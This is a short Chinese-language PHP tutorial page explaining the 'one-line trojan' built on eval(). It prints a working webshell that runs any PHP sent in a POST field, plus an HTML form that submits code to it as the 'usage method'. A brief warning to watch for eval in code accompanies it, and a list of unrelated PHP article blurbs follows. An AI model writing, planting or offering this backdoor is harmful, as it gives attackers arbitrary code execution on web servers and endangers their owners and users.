php eval函数一句话木马代码
更新时间:2015年05月21日 11:03:25 投稿:hebedich
这个是php常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算。该字符串必须是合法的PHP代码,且必须以分号结尾。如果没有在代码字符串中调用return语句,则返回NULL。如果代码中存在解析错误,则eval()函数返回false。
eval可以用来执行任何其他php代码,所以对于代码里发现了eval函数一定要小心,可能是木马
就这一句话害死人,这样任何人都可以post任何文件上来,所以要做好防范
<?php @eval($_POST['c']);?>
使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行
<html> <body> <form action="a.php" method="post"> <input type="text" name="c" value="phpinfo();"> <input type="submit" value="submit"> </form> </body> </html>
以上所述就是本文的全部内容了,希望大家能够喜欢。
相关文章
本篇文章是对判断php数组维度的代码进行了详细的分析介绍, 需要的朋友参考下2013-06-06
这篇文章主要介绍了PHP实现通过Luhn算法校验信用卡卡号是否有效,实例分析了php实现Luhn算法及相关应用技巧,具有一定参考借鉴价值,需要的朋友可以参考下2015-03-03
在实际项目或者自己编写小工具(比如新闻聚合,商品价格监控,比价)的过程中, 通常需要从第3方网站或者API接口获取数据, 在需要处理1个URL队列时, 为了提高性能, 可以采用cURL提供的curl_multi_*族函数实现简单的并发2012-09-09
当执行某一操作比如确认或者取消时如何弹出对话框,针对这个需求,下面使用php来实现下,感兴趣的朋友不要错过2013-12-12
玩PHP玩了几年了,在刚刚接触PHP的时候感觉正则真的很洋气,我想替换啥就替换啥。然而随着工作的推移,渐渐对正则开发反感起来,正则的速度太慢了,而且特占内存。在一个群里有个网友说,正则速度快,正则简单,正则开发效率高。我并没有与他争辩,因为我刚刚做PHP的时候也是这样的想法。但是正则真的那么好吗?2008-03-03
这篇文章主要介绍了PHP实现恶意DDOS攻击避免带宽占用问题方法,本文介绍的是一个简单方法,需要的朋友可以参考下2015-05-05
这篇文章主要介绍了CentOS7系统搭建LAMP及更新PHP版本操作,总结分析了CentOS7系统搭建LAMP及更新PHP版本操作相关原理、步骤、操作命令与注意事项,需要的朋友可以参考下2020-03-03
php中ob(Output Buffer 输出缓冲)函数使用方法
php中ob(Output Buffer 输出缓冲)函数使用方法...2007-07-07
PHP无刷新上传文件实现代码,使用php的朋友可以参考下。2011-09-09
这篇文章主要介绍了PHP实现获取第一个中文首字母并进行排序的方法,涉及php数组遍历、编码转换及数组排序相关操作技巧,需要的朋友可以参考下2017-05-05
最新评论